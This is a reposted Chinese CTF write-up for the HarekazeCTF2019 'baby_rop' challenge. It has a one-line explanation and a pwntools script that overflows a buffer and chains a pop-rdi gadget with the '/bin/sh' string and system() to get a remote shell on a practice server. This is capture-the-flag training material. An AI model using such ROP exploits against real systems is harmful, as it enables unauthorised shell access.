[HarekazeCTF2019]baby_rop

本文轉載自查看原文 2020-02-10 10:47 847 BUUCTF

程序已經給了system和binsh ，用寄存器傳參就可以了

from pwn import *

r=remote('node3.buuoj.cn',25737)
elf=ELF('./babyrop')
system_addr=elf.symbols['system']
binsh_addr=0x601048
rdi_addr=0x400683

payload='a'*0x10+'b'*0x8+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)+p64(0xdeadbeef) #system(/bin/sh)
r.sendline(payload)

r.interactive()

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 [HarekazeCTF2019]baby_rop2 [HarekazeCTF2019]encode_and_encode 刷題記錄：[HarekazeCTF2019]Sqlite Voting 刷題記錄：[HarekazeCTF2019]encode_and_encode 2019護網杯baby_forensic ROP 【2019 Roar CTF】baby RSA + 威爾遜定理 + python寫腳本小結 Pwn之ROP系列練習 Linux內核ROP學習滲透入門rop